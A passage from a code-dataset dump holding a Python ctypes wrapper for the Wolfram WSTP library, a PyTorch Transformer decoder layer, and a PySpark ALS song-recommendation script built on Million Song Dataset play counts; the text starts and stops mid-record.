penv\n\n def __enter__(self):\n self. plnk = WSLoopbackOpen(self.penv)\n return self\n\n def __exit__(self, errtype, err, traceback):\n if not err:\n WSClose(self.plnk)\n\nclass WSTPTempLoopbackContext:\n '''\n Some WSTP API requires a temporary loopback link to store data,\n this class provides a simple and safe way to do that.\n\n Example:\n penv = WSInitialize()\n lbctx = WSTPThrowawayLoopbackContext(penv)\n with lbctx.temp_link() as lb:\n plnk = lb.plnk\n WSPutXXX(plnk, ...)\n WSGetXXX(plnk, ...)\n ...\n '''\n __slots__ = ('penv')\n def __init__(self, penv):\n assert isinstance(penv, WSLINK_t)\n # make copy to avoid cross reference causing\n # failure to call __del__ in certain objects\n self.penv = cast(penv, WSLINK_t)\n\n def temp_link(self):\n return WSTPTempLoopbackLink(self.penv)\n\ndef check_error(errno_, msg=''):\n if errno_ != WSEOK:\n raise WSTPError(errno_, msg)\n\ndef check_link_error(lnk_p, msg=None, msg_prefix=None):\n errno_ = WSError(lnk_p)\n msg = WSErrorMessage(lnk_p) if msg is None else msg\n if msg_prefix is not None:\n msg = '%s: %s' % (msg_prefix, msg)\n check_error(errno_.value, msg)\n\ndef decode_pointer_buffer(ptr, nbytes, encoding='utf-8'):\n if not ptr:\n return ''\n vptr = cast(ptr, c_void_p)\n buf = (c_ubyte * nbytes).from_address(vptr.value)\n if encoding is None:\n return bytes(buf)\n else:\n return codecs.decode(buf, encoding=encoding)\n\n# ==== C API wrappers\n\ndef WSInitialize(env_p=0):\n return c_void_p(naked.__WSInitialize(env_p))\n\ndef WSDeinitialize(env_p):\n naked.__WSDeinitialize(env_p)\n\ndef WSOpenArgcArgv(env_p, *args):\n argc = c_int(len(args))\n argv = (c_char_p * len(args))()\n err = WSERRNO_t()\n for i,s in enumerate(args):\n argv[i] = s.encode('utf-8')\n lnk_p = naked.__WSOpenArgcArgv(env_p, argc, argv, byref(err))\n check_error(err.value, 'WSOpenArgcArgv')\n return lnk_p\n\ndef WSOpenString(env_p, cmd_line):\n err = WSERRNO_t()\n lnk_p = WSLINK_t(naked.__WSOpenString(\n env_p, cmd_line.encode('utf-8'), byref(err)))\n check_error(err.value, \"WSOpenString\")\n return lnk_p\n\ndef WSLoopbackOpen(env_p):\n err = WSERRNO_t()\n lnk_p = WSLINK_t(naked.__WSLoopbackOpen(env_p, byref(err)))\n check_error(err.value, \"WSLoopbackOpen\")\n return lnk_p\n\ndef WSActivate(lnk_p):\n if not naked.__WSActivate(lnk_p):\n check_link_error(lnk_p, msg_prefix=\"WSActivate\")\n\ndef WSDuplicateLink(lnk_p, name):\n err = WSERRNO_t()\n lnk_p = naked.__WSDuplicateLink(\n lnk_p, name.encode('utf-8'), byref(err))\n check_error(err.value, 'WSDuplicateLink')\n return lnk_p\n\ndef WSClose(lnk_p):\n naked.__WSClose(lnk_p)\n\ndef WSLinkName(lnk_p):\n return naked.__WSLinkName(lnk_p).value\n\nWSToLinkID = naked.__WSToLinkID\nWSFromLinkID = naked.__WSFromLinkID\n\ndef WSVersionNumbers(env_p):\n i, r, b = c_int(), c_int(), c_int()\n naked.__WSVersionNumbers(env_p, byref(i), byref(r), byref(b))\n return (i.value, r.value, b.value)\n\ndef WSNewLinkServer(env_p, ipaddr, port):\n err = WSERRNO_t()\n if isinstance(ipaddr, str):\n ipaddr = ipaddr.encode()\n assert isinstance(ipaddr, bytes)\n assert isinstance(port, int)\n server_p = naked.__WSNewLinkServerWithPortAndInterface(\n env_p, c_ushort(port), cast(ipaddr, c_char_p), c_void_p(0), byref(err))\n if err.value != WSEOK:\n raise WSTPError(err.value, 'WSNewLinkServer')\n return server_p\n\ndef WSShutdownLinkServer(server_p):\n naked.__WSShutdownLinkServer(server_p)\n\ndef WSRegisterCallbackFunctionWithLinkServer(server_p, fn):\n '''\n Args:\n server_p: pointer to link server\n fn: python callable\n '''\n if not isinstance(fn ,WSLINKSERVERCALLBACK_t):\n fn = WSLINKSERVERCALLBACK_t(fn)\n naked.__WSRegisterCallbackFunctionWithLinkServer(server_p, fn)\n return fn\n\ndef WSWaitForNewLinkFromLinkServer(server_p):\n '''\n Returns: pointer to link\n '''\n err = WSERRNO_t()\n lnk_p = naked.__WSWaitForNewLinkFromLinkServer(server_p, byref(err))\n check_error(err.value, 'WSWaitForNewLinkFromLinkServer')\n return lnk_p\n\ndef WSNewPacket(lnk_p):\n if not naked.__WSNewPacket(lnk_p):\n check_link_error(lnk_p, msg_prefix=\"WSNewPacket\")\n\ndef WSEndPacket(lnk_p):\n if not naked.__WSEndPacket(lnk_p):\n check_link_error(lnk_p, msg_prefix=\"WSEndPacket\")\n\ndef WSPutType(lnk_p, tok):\n if not naked.__WSPutType(lnk_p, tok):\n check_link_error(lnk_p, msg_prefix='WSPutType')\n\ndef WSPutNext(lnk_p, tok):\n if not naked.__WSPutNext(lnk_p, tok):\n check_link_error(lnk_p, msg_prefix='WSPutNext')\n\ndef WSPutSize(lnk_p, n):\n if not naked.__WSPutSize(lnk_p, n):\n check_link_error(lnk_p, msg_prefix='WSPutSize')\n\ndef WSPutData(lnk_p, s):\n '''\n Args:\n lnk_p: pointer to link\n s: buffer-like\n '''\n if not naked.__WSPutData(lnk_p, cast(s, c_char_p), len(s)):\n check_link_error(lnk_p, msg_prefix='WSPutData')\n\ndef WSPutRawData(lnk_p, s):\n '''\n Args:\n lnk_p: pointer to link\n s: buffer-like\n '''\n if not naked.__WSPutData(lnk_p, cast(s, POINTER(c_ubyte)), len(s)):\n check_link_error(lnk_p, msg_prefix='WSPutRawData')\n\ndef WSPutInteger8(lnk_p, i):\n if not naked.__WSPutInteger8(lnk_p, c_uint8(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger8\")\n\ndef WSGetInteger8(lnk_p):\n i = c_int8()\n if not naked.__WSGetInteger8(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger8\")\n return i.value\n\ndef WSPutInteger16(lnk_p, i):\n if not naked.__WSPutInteger16(lnk_p, c_int32(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger16\")\n\ndef WSGetInteger16(lnk_p):\n i = c_int16()\n if not naked.__WSGetInteger16(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger16\")\n return i.value\n\ndef WSPutInteger32(lnk_p, i):\n if not naked.__WSPutInteger32(lnk_p, c_int32(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger32\")\n\ndef WSGetInteger32(lnk_p):\n i = c_int32()\n if not naked.__WSGetInteger32(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger32\")\n return i.value\n\ndef WSPutInteger64(lnk_p, i):\n if not naked.__WSPutInteger64(lnk_p, c_int64(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger64\")\n\ndef WSGetInteger64(lnk_p):\n i = c_int64()\n if not naked.__WSGetInteger64(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger64\")\n return i.value\n\ndef WSPutInteger8List(lnk_p, li):\n raise NotImplementedError() # TODO\n\ndef WSGetInteger8List(lnk_p, li):\n raise NotImplementedError() # TODO\n\ndef WSReleaseInteger8List(lnk_p, li_p):\n raise NotImplementedError() # TODO\n\ndef WSPutReal64(lnk_p, f):\n if not naked.__WSPutReal64(lnk_p, f):\n check_link_error(lnk_p, msg_prefix=\"WSPutReal64\")\n\ndef WSGetReal64(lnk_p):\n f = c_double()\n if not naked.__WSGetReal64(lnk_p, byref(f)):\n check_link_error(lnk_p, msg_prefix=\"WSGetReal64\")\n return f.value\n\ndef WSPutString(lnk_p, s, encoding=None):\n '''\n Args:\n lnk_p: pointer to link\n s: string if encoding is None, bytes otherwise\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n assert isinstance(s, str)\n sb = s.encode('utf-8')\n if not naked.__WSPutUTF8String(\n lnk_p, cast(sb, POINTER(c_ubyte)), len(sb)):\n check_link_error(lnk_p, msg_prefix='WSPutUTF8String')\n return\n assert isinstance(s, bytes)\n if encoding == 'wolfram':\n if not naked.__WSPutString(lnk_p, s):\n check_link_error(lnk_p, msg_prefix='WSPutString')\n else:\n fn_put = {\n 'utf-8': naked.__WSPutUTF8String,\n 'utf-16': naked.__WSPutUTF16String,\n 'utf-32': naked.__WSPutUTF32String,\n }[encoding]\n if not fn_put(lnk_p, s, len(s)):\n check_link_error(lnk_p, msg_prefix=fn_put.__name__)\n\ndef WSGetString(lnk_p, encoding=None):\n '''\n Returns string if encoding is None, bytes otherwise\n Args:\n lnk_p: pointer to link\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n msg = WSGetString(lnk_p, encoding='utf-8').decode('utf-8')\n elif encoding == 'wolfram':\n sptr = c_char_p()\n if not naked.__WSGetString(lnk_p, byref(sptr)):\n check_link_error(lnk_p, msg_prefix=\"WSGetString\")\n msg = sptr.value\n naked.__WSReleaseString(sptr)\n else:\n elem_t, fn_getstr, fn_release = {\n 'utf-8': (c_ubyte, naked.__WSGetUTF8String, naked.__WSReleaseUTF8String),\n 'utf-16': (c_uint16, naked.__WSGetUTF16String, naked.__WSReleaseUTF16String),\n 'utf-32': (c_uint32, naked.__WSGetUTF32String, naked.__WSReleaseUTF32String),\n }[encoding]\n nbytes, nchars = c_int(), c_int()\n sptr = POINTER(elem_t)()\n if not fn_getstr(lnk_p, byref(sptr), byref(nbytes), byref(nchars)):\n check_link_error(lnk_p, msg_prefix=fn_getstr.__name__)\n msg = decode_pointer_buffer(sptr, nbytes.value, encoding=None)\n fn_release(lnk_p, sptr, nbytes)\n return msg\n\ndef WSPutByteString(lnk_p, s:bytes):\n if not naked.__WSPutByteString(lnk_p, cast(s, POINTER(c_ubyte)), len(s)):\n check_link_error(lnk_p, msg_prefix=\"WSPutByteString\")\n\ndef WSGetByteString(lnk_p):\n sptr = POINTER(c_ubyte)()\n nbytes = c_long()\n if not naked.__WSGetByteString(lnk_p, byref(sptr), byref(nbytes), 0):\n check_link_error(lnk_p, msg_prefix=\"WSGetByteString\")\n bs = decode_pointer_buffer(sptr, nbytes.value, encoding=None)\n naked.__WSReleaseByteString(lnk_p, sptr)\n return bs\n\ndef WSPutSymbol(lnk_p, s, encoding=None):\n '''\n Args:\n lnk_p: pointer to link\n s: string if encoding is None, bytes otherwise\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n assert isinstance(s, str)\n if not naked.__WSPutUTF8Symbol(lnk_p, cast(s.encode('utf-8'), POINTER(c_ubyte)), len(s)):\n check_link_error(lnk_p, msg_prefix='WSPutUTF8Symbol')\n return\n assert isinstance(s, bytes)\n if encoding == 'wolfram':\n if not naked.__WSPutSymbol(lnk_p, s):\n check_link_error(lnk_p, msg_prefix='WSPutString')\n else:\n fn_put = {\n 'utf-8': naked.__WSPutUTF8Symbol,\n 'utf-16': naked.__WSPutUTF16Symbol,\n 'utf-32': naked.__WSPutUTF32Symbol,\n }[encoding]\n sptr = cast(s, fn_put.argtypes[1])\n if not fn_put(lnk_p, sptr, len(s)):\n check_link_error(lnk_p, msg_prefix=fn_put.__name__)\n\ndef WSGetSymbol(lnk_p, encoding=None):\n '''\n Returns string if encoding is None, bytes otherwise\n Args:\n lnk_p: pointer to link\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n msg = WSGetSymbol(lnk_p, encoding='utf-8').decode('utf-8')\n elif encoding == 'wolfram':\n sptr = c_char_p()\n if not naked.__WSGetSymbol(lnk_p, byref(sptr)):\n check_link_error(lnk_p, msg_prefix=\"WSGetSymbol\")\n msg = sptr.value\n naked.__WSReleaseSymbol(sptr)\n else:\n elem_t, fn_getstr, fn_release = {\n 'utf-8': (c_ubyte, naked.__WSGetUTF8Symbol, naked.__WSReleaseUTF8Symbol),\n 'utf-16': (c_uint16, naked.__WSGetUTF16Symbol, naked.__WSReleaseUTF16Symbol),\n 'utf-32': (c_uint32, naked.__WSGetUTF32Symbol, naked.__WSReleaseUTF32Symbol),\n }[encoding]\n nbytes, nchars = c_int(), c_int()\n sptr = POINTER(elem_t)()\n if not fn_getstr(lnk_p, byref(sptr), byref(nbytes), byref(nchars)):\n check_link_error(lnk_p, msg_prefix=fn_getstr.__name__)\n msg = decode_pointer_buffer(sptr, nbytes.value, encoding=None)\n fn_release(lnk_p, sptr, nbytes)\n return msg\n\ndef WSPutFunction(lnk_p, fname, nargs, encoding=None):\n '''\n Args:\n lnk_p: pointer to link\n fname: string if encoding is None, bytes otherwise\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n assert isinstance(fname, str)\n fname_s = fname.encode('utf-8')\n if not naked.__WSPutUTF8Function(\n lnk_p, cast(fname_s, POINTER(c_ubyte)),\n c_int(len(fname_s)), c_int(nargs)):\n check_link_error(lnk_p, 'WSPutUTF8Function')\n return\n assert isinstance(fname, bytes)\n if encoding == 'wolfram':\n if not naked.__WSPutFunction(lnk_p, fname, nargs):\n check_link_error(lnk_p, msg_prefix='WSPutString')\n else:\n fn_put = {\n 'utf-8': naked.__WSPutUTF8Function,\n 'utf-16': naked.__WSPutUTF16Function,\n 'utf-32': naked.__WSPutUTF32Function,\n }[encoding]\n ptr = cast(fname, fn_put.argtypes[1])\n if not fn_put(lnk_p, ptr, c_int(len(fname)), c_int(nargs)):\n check_link_error(lnk_p, msg_prefix=fn_put.__name__)\n\ndef WSGetFunction(lnk_p, encoding=None):\n '''\n Returns (head, argcount)\n head is string if encoding is None, bytes otherwise\n\n Args:\n lnk_p: C pointer to link object\n encoding: None, 'utf-8', 'utf-16', 'utf-32',\n '''\n # TODO add encoding support\n argcount_i = c_int()\n head_p = c_char_p()\n if not naked.__WSGetFunction(lnk_p, byref(head_p), byref(argcount_i)):\n check_link_error(lnk_p, msg_prefix='WSGetFunction')\n return head_p.value.decode('utf-8'), argcount_i.value\n # FIXME below is a hacky/buggy impl, should call WSGet*Function after symbol not exported\n # bug is resolved. Also the following code cause memory corruption\n '''\n if encoding == 'wolfram':\n argcount_i = c_int()\n phead = c_char_p()\n if not naked.__WSGetFunction(lnk_p, byref(phead), byref(argcount_i)):\n check_link_error(lnk_p, msg_prefix='WSGetFunction')\n head = phead.value.decode('utf-8')\n argcount = argcount_i.value\n naked.__WSReleaseSymbol(lnk_p, phead)\n else:\n # since getter functions are missing from DLL, have to use this hack\n WSGetNext(lnk_p)\n argcount = WSGetArgCount(lnk_p)\n head = WSGetSymbol(lnk_p, encoding=encoding)\n return head, argcount\n '''\n\ndef WSGetNext(lnk_p):\n typ = naked.__WSGetNext(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetNext error\")\n return typ\n\ndef WSGetNextRaw(lnk_p):\n typ = naked.__WSGetNextRaw(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetNextRaw error\")\n return typ\n\ndef WSGetType(lnk_p):\n typ = naked.__WSGetType(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetType error\")\n return typ\n\ndef WSGetArrayType(lnk_p):\n '''\n Returns: (leaf_token, shape:tuple(int...), heads:tuple(str...))\n '''\n # does not call naked.__WSGetArrayType,\n # because array_meterp is opaque\n head_li = []\n shape_li = []\n leaf_token = None\n mrk_p = WSCreateMark(lnk_p)\n def load_tensor_axis(): # closure\n head, narg = WSGetFunction(lnk_p)\n head_li.append(head)\n shape_li.append(narg)\n load_tensor_axis()\n while True:\n tok = WSGetRawType(lnk_p)\n if tok == WSTKFUNC:\n load_tensor_axis()\n else:\n leaf_token = tok\n break\n WSSeekToMark(lnk_p, mrk_p)\n WSDestroyMark(lnk_p, mrk_p)\n return leaf_token, tuple(shape_li), tuple(head_li)\n\ndef WSGetRawType(lnk_p):\n typ = naked.__WSGetRawType(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetRawType error\")\n return typ\n\ndef WSGetArgCount(lnk_p):\n count = c_int()\n if not naked.__WSGetArgCount(lnk_p, byref(count)):\n check_link_error(lnk_p, msg_prefix=\"WSGetArgCount\")\n return count.value\n\ndef WSBytesToGet(lnk_p):\n nbytes = c_int()\n if not naked.__WSBytesToGet(lnk_p, byref(nbytes)):\n check_link_error(lnk_p, msg_prefix='WSBytesToGet')\n return nbytes.value\n\ndef WSRawBytesToGet(lnk_p):\n nbytes = c_int()\n if not naked.__WSRawBytesToGet(lnk_p, byref(nbytes)):\n check_link_error(lnk_p, msg_prefix='WSRawBytesToGet')\n return nbytes.value\n\ndef WSGetRawData(lnk_p, size):\n '''\n Returns: bytearray\n Args:\n lnk_p: pointer to link\n size: int\n '''\n got_i = c_int()\n total_got = 0\n buf = bytes(size)\n cptr = c_char_p(buf)\n vptr_value = cast(cptr, c_void_p).value\n bufptr_t = POINTER(c_ubyte)\n while total_got < size:\n if not naked.__WSGetRawData(\n lnk_p, cast(vptr_value + total_got, bufptr_t),\n size, byref(got_i)\n ):\n check_link_error(lnk_p, msg_prefix='WSGetRawData')\n total_got += got_i.value\n return buf\n\ndef WSError(lnk_p):\n return WSERRNO_t(naked.__WSError(lnk_p))\n\ndef WSErrorMessage(lnk_p, encoding='utf-8'):\n encoding = encoding.lower()\n if encoding == 'ascii':\n sptr = naked.__WSErrorMessage(lnk_p)\n if not sptr:\n return ''\n msg = cast(sptr, c_char_p).value.decode(encoding)\n naked.__WSReleaseErrorMessage(lnk_p, sptr)\n else:\n msglen = c_int()\n fn_errmsg, fn_release = {\n 'utf-8': (\n naked.__WSUTF8ErrorMessage, naked.__WSReleaseUTF8ErrorMessage),\n 'utf-16': (\n naked.__WSUTF16ErrorMessage, naked.__WSReleaseUTF16ErrorMessage),\n 'utf-32': (\n naked.__WSUTF32ErrorMessage, naked.__WSReleaseUTF32ErrorMessage),\n }[encoding]\n sptr = fn_errmsg(lnk_p, byref(msglen))\n msg = decode_pointer_buffer(sptr, msglen.value, encoding=encoding)\n naked.__WSReleaseUTF8ErrorMessage(lnk_p, sptr, msglen)\n return msg\n\ndef WSReady(lnk_p):\n return bool(naked.__WSReady(lnk_p))\n\ndef WSFlush(lnk_p):\n if not naked.__WSFlush(lnk_p):\n check_link_error(lnk_p, msg_prefix='WSFlush')\n\ndef WSCreateMark(lnk_p):\n mark_p = naked.__WSCreateMark(lnk_p)\n if not mark_p:\n raise RuntimeError('WSCreateMark: got NULL mark pointer, failed')\n return mark_p\n\ndef WSSeekToMark(lnk_p, mrk_p, offset=0):\n new_mrk_p = naked.__WSSeekMark(lnk_p, mrk_p, c_int(offset))\n if not new_mrk_p:\n raise RuntimeError('WSSeekToMark: got NULL mark pointer, failed')\n return new_mrk_p\n\ndef WSDestroyMark(lnk_p, mrk_p):\n naked.__WSDestroyMark(lnk_p, mrk_p)\n\ndef WSWaitForLinkActivity(lnk_p):\n if not naked.__WSWaitForLinkActivity(lnk_p):\n check_link_error(lnk_p, msg_prefix='WSWaitForLinkActivity')\n","sub_path":"wstp/lowrapper.py","file_name":"lowrapper.py","file_ext":"py","file_size_in_byte":19862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"518818401","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : Wed Jan 9 18:28:43 2019\n# @Author : JRP - Ruipeng Jia\n\nfrom torch import nn\n\n# from modules.attention_multi_head import MultiHeadAttention as Attention\nfrom modules.attention_dot_product import DotProductAttention as Attention\nfrom modules.positional_wise_feedforward import PositionalWiseFeedForward\n\n\nclass DecoderLayer(nn.Module):\n\n def __init__(self, args):\n super(DecoderLayer, self).__init__()\n self.args = args\n\n self.attention = Attention(self.args)\n self.feed_forward = PositionalWiseFeedForward(self.args)\n\n def forward(self, dec_input, enc_outputs, non_pad_mask=None, self_attn_mask=None, context_attn_mask=None):\n # dec_input: (B, L_q, D), Embedded input tensor\n # enc_outputs: (B, L_k, D), Encoder's output\n # self_attn_mask: (B, L_q, L_k), pad_mask + seq_mask\n # context_attn_mask: (B, L_q, L_k), Padding mask tensor\n\n dec_output, self_attention = self.attention(dec_input, dec_input, dec_input, self_attn_mask) # self attention; all inputs are decoder inputs\n dec_output *= non_pad_mask\n\n dec_output, context_attention = self.attention(dec_output, enc_outputs, enc_outputs, context_attn_mask) # context attention; query is decoder's outputs, key and value are encoder's inputs\n dec_output *= non_pad_mask\n\n dec_output = self.feed_forward(dec_output) # decoder's output, or context\n dec_output *= non_pad_mask\n\n return dec_output, self_attention, context_attention # (B, L, D)\n","sub_path":"bin/template/src/jptproject/l5_2018_12_Pytorch_Summarization_with_Pointer-Generator_Networks/sublayers/transformer_decoder_layer.py","file_name":"transformer_decoder_layer.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168932582","text":"# import libraries\nimport os\n\nfrom pyspark.shell import sqlContext\nfrom pyspark.sql.types import *\nfrom pyspark.sql import functions as F\n\nfrom pyspark.ml.recommendation import ALS\nfrom pyspark.ml.evaluation import RegressionEvaluator\n\n\n# list directories\nfiles_path = '../DataSet/' # File path here ../DataSet/ #../MDM_Project/Dataset/\n\ntriplets_file = files_path + 'train_triplets.txt'\nsongs2tracks_file = files_path + 'song_to_tracks.txt'\nmetadata_file = files_path + 'track_metadata.csv'\n\n# Handle Windows.\nif os.path.sep != '/':\n triplets_file = triplets_file.replace('/', os.path.sep)\n songs2tracks_file = songs2tracks_file.replace('/', os.path.sep)\n metadata_file = metadata_file.replace('/', os.path.sep)\n\n# Creating schema so the cluster only runs through the data once\ntriplets_schema = StructType(\n [StructField('userId', StringType()),\n StructField('songId', StringType()),\n StructField('Plays', IntegerType())]\n)\nsongs2tracks_schema = StructType(\n [StructField('songId', StringType()),\n StructField('trackId', StringType())]\n)\nmetadata_schema = StructType(\n [StructField('trackId', StringType()),\n StructField('title', StringType()),\n StructField('songId', StringType()),\n StructField('release', StringType()),\n StructField('artist_id', StringType()),\n StructField('artist_mbid', StringType()),\n StructField('artist_name', StringType()),\n StructField('duration', DoubleType()),\n StructField('artist_familiarity', DoubleType()),\n StructField('artist_hotttness', DoubleType()),\n StructField('year', IntegerType()),\n StructField('track_7digitalid', IntegerType()),\n StructField('shs_perf', DoubleType()),\n StructField('shs_work', DoubleType())]\n)\n\n# load the data into DataFrames\nplays_df = sqlContext.read.format('com.databricks.spark.csv') \\\n .options(delimiter='\\t', header=True, inferSchema=False) \\\n .schema(triplets_schema) \\\n .load(triplets_file)\n\nsongs2tracks_df = sqlContext.read.format('com.databricks.spark.csv') \\\n .options(delimiter=',', header=True, inferSchema=False) \\\n .schema(songs2tracks_schema) \\\n .load(songs2tracks_file)\n\nmetadata_df = sqlContext.read.format('com.databricks.spark.csv') \\\n .options(delimiter=',', header=True, inferSchema=False) \\\n .schema(metadata_schema) \\\n .load(metadata_file)\n\n# change ids from strings to integers\nuserId_change = plays_df.select('userId').distinct().select('userId',F.monotonically_increasing_id().alias('new_userId'))\nuser_als_id_LUT = sqlContext.createDataFrame(userId_change.rdd.map(lambda x: x[0]).zipWithIndex(), StructType([StructField(\"userId\", StringType(), True),StructField(\"user_als_id\", IntegerType(), True)]))\n\nsongId_change = plays_df.select('songId').distinct().select('songId', F.monotonically_increasing_id().alias('new_songId'))\nsong_als_id_LUT = sqlContext.createDataFrame(songId_change.rdd.map(lambda x: x[0]).zipWithIndex(), StructType([StructField(\"songId\", StringType(), True),StructField(\"song_als_id\", IntegerType(), True)]))\n\n# RUN BELOW TWO LINES TO CHECK IF THE NEW USER_ID, SONG_ID GENERATED PROPERLY\n# user_als_id_LUT.show(5)\n# song_als_id_LUT.show(5)\n\n# Get total unique users and songs\nunique_users = user_als_id_LUT.count()\nunique_songs = song_als_id_LUT.count()\nprint('Number of unique users: {0}'.format(unique_users))\nprint('Number of unique songs: {0}'.format(unique_songs))\n\n# Joining the new ID's to the Plays_df\nplays_df_2 = plays_df.join(user_als_id_LUT,'userId').join(song_als_id_LUT,'songId')\n\n# remove half users to make more manageable\nplays_df_2 = plays_df_2.filter(plays_df_2.user_als_id < unique_users / 2)\n\n# Summary of each DataFrame\nplays_df_2.cache()\nplays_df_2.show(5)\n\nsongs2tracks_df.cache()\nsongs2tracks_df.show(5)\n\nmetadata_df.cache()\nmetadata_df.show(5)\n\n#Total Listens(plays) of Each SongID\nTotal_listens = plays_df_2.groupBy('songId') \\\n .agg(F.count(plays_df_2.Plays).alias('User_Count'),\n F.sum(plays_df_2.Plays).alias('Total_Plays')) \\\n .orderBy('Total_Plays', ascending = False)\n\nprint('Total Listens of Each SONG_ID:')\nTotal_listens.show(3, truncate=False)\n\n# Joining with metadata to get artist and song title for the Total_Listens\nSong_names = Total_listens.join(metadata_df, 'songId' ) \\\n .filter('User_Count >= 200') \\\n .select('artist_name', 'title', 'songId', 'User_Count','Total_Plays') \\\n .orderBy('Total_Plays', ascending = False)\n\nprint('Complete Details of Songs Listened')\nSong_names.show(20, truncate = False)\n\n# We'll hold out 60% for training, 20% of our data for validation, and leave 20% for testing\nseed = 180229192\n(split_1, split_2, split_3) = plays_df_2.randomSplit([0.6, 0.2, 0.2], seed = seed)\n\n# Let's cache these datasets for performance\ntrain_set = split_1.cache()\nvalidation_set = split_2.cache()\ntest_set = split_3.cache()\n\nprint('Training: {0}, validation: {1}, test: {2}\\n'.format(\n train_set.count(), validation_set.count(), test_set.count())\n)\ntrain_set.show(5)\nvalidation_set.show(5)\ntest_set.show(5)\n\n# Number of plays needs to be double type\nvalidation_set = validation_set.withColumn(\"Plays\", validation_set[\"Plays\"].cast(DoubleType()))\nvalidation_set.show(5)\n\n## MODEL GENERATION (Alternating Least Squares)\n\n# initialising our First ALS learner\nals_01 = ALS()\n# Setting the parameters for the method\nals_01.setMaxIter(5)\\\n .setSeed(seed)\\\n .setItemCol(\"song_als_id\")\\\n .setRatingCol(\"Plays\")\\\n .setUserCol(\"user_als_id\")\n\n# computing an evaluation metric for our test dataset\n# We Create an RMSE evaluator using the label and predicted columns\n\nreg_eval = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"Plays\", metricName=\"rmse\")\n\ntolerance = 0.03\nranks = [4, 8, 12, 16]\nregParams = [0.15, 0.2, 0.25]\nerrors = [[0]*len(ranks)]*len(regParams)\nmodels = [[0]*len(ranks)]*len(regParams)\nerr = 0\nmin_error = float('inf')\nbest_rank = -1\n\ni = 0\nfor regParam in regParams:\n j = 0\n for rank in ranks:\n # Set the rank here:\n als_01.setParams(rank = rank, regParam = regParam)\n # Create the model with these parameters.\n model = als_01.fit(train_set)\n # Run the model to create a prediction. Predict against the validation_df.\n predictions = model.transform(validation_set)\n\n # Remove NaN values from prediction (due to SPARK-14489)\n predicted_plays = predictions.filter(predictions.prediction != float('nan'))\n predicted_plays = predicted_plays.withColumn(\"prediction\", F.abs(F.round(predicted_plays[\"prediction\"],0)))\n\n # Run the previously created RMSE evaluator, reg_eval, on the predicted_plays DataFrame\n error = reg_eval.evaluate(predicted_plays)\n errors[i][j] = error\n models[i][j] = model\n print ('For rank :',rank, ' regularization parameter:', regParam,' the RMSE is', error)\n if error < min_error:\n min_error = error\n best_params = [i,j]\n j += 1\n i += 1\n\nals_01.setRegParam(regParams[best_params[0]])\nals_01.setRank(ranks[best_params[1]])\nprint ('The best model was trained with regularization parameter %s' % regParams[best_params[0]])\nprint ('The best model was trained with rank %s' % ranks[best_params[1]])\nmy_model = models[best_params[0]][best_params[1]]\n\n#predicted plays\npredicted_plays.show(10)\n\n## TESTING THE MODEL\n\ntest_set = test_set.withColumn(\"Plays\", test_set[\"Plays\"].cast(DoubleType()))\npredict_df = my_model.transform(test_set)\n\n# Remove NaN values from prediction (due to SPARK-14489)\nTest_predictions = predict_df.filter(predict_df.prediction != float('nan'))\n\n# Round floats to whole numbers\nTest_predictions = Test_predictions.withColumn(\"prediction\", F.abs(F.round(Test_predictions[\"prediction\"],0)))\n# Run the previously created RMSE evaluator, reg_eval, on the predicted_test_df DataFrame\nTest_RMSE = reg_eval.evaluate(Test_predictions)\nprint('The model had a RMSE on the test set of {0}'.format(Test_RMSE))\n\n# Comparing the Model\navg_plays = train_set.groupBy().avg('Plays').select(F.round('avg(Plays)'))\navg_plays.show(3)\ntrain_avg_plays = avg_plays.collect()[0][0]\nprint('The average number of plays in the dataset is {0}'.format(train_avg_plays))\n\n# Add a column with the average rating\ntest_avg = test_set.withColumn('prediction', F.lit(train_avg_plays))\n\n# Run the previously created RMSE evaluator, reg_eval, on the test_for_avg_df DataFrame\ntest_avg_RMSE = reg_eval.evaluate(test_avg)\nprint(\"The RMSE on the average set is {0}\".format(test_avg_RMSE))\n\n## PREDICTION FOR AN USER\n\nUserID = 13\nsongs_listened = plays_df_2.filter(plays_df_2.user_als_id == UserID) \\\n .join(metadata_df, 'songId') \\\n .select('song_als_id', 'artist_name', 'title') \\\n \\\n# Generating List of Listened Songs\nlistened_songs_list = []\nfor song in songs_listened.collect():\n listened_songs_list.append(song['song_als_id'])\n\nprint('Songs user has listened to:')\nsongs_listened.select('artist_name', 'title').show()\n\n# generate dataframe of unlistened songs\nsongs_unlistened = plays_df_2.filter( ~ plays_df_2['song_als_id'].isin(listened_songs_list)) \\\n .select('song_als_id').withColumn('user_als_id', F.lit(UserID)).distinct()\n\n# feed unlistened songs into model\npredicted_listens = my_model.transform(songs_unlistened)\n\n# remove NaNs\npredicted_listens = predicted_listens.filter(predicted_listens['prediction'] != float('nan'))\n\n# print output\nprint('Predicted Songs:')\npredicted_listens.join(plays_df_2, 'song_als_id') \\\n .join(metadata_df, 'songId') \\\n .select('artist_name', 